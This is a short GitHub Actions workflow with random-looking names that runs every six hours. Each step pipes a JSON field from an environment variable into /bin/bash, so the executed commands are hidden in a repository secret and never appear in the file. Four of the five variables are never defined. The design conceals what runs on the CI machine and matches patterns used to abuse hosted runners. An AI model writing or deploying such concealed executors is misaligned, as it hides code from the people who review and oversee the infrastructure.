name: dongkuangyu7654

on:
  workflow_dispatch:
  schedule:
    - cron: '52 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dongkuangyu7654
        env:
          ykhs7230: ${{ secrets.ykhs7230 }}
        run: |
          echo $ykhs7230 | jq -r .s50574 | /bin/bash
          echo $r00264 | jq -r .lspe47926 | /bin/bash
          echo $lhe30130 | jq -r .nkzv8945 | /bin/bash
          echo $mpg0197 | jq -r .k134 | /bin/bash
          echo $hvgld128 | jq -r .jqnow4 | /bin/bash

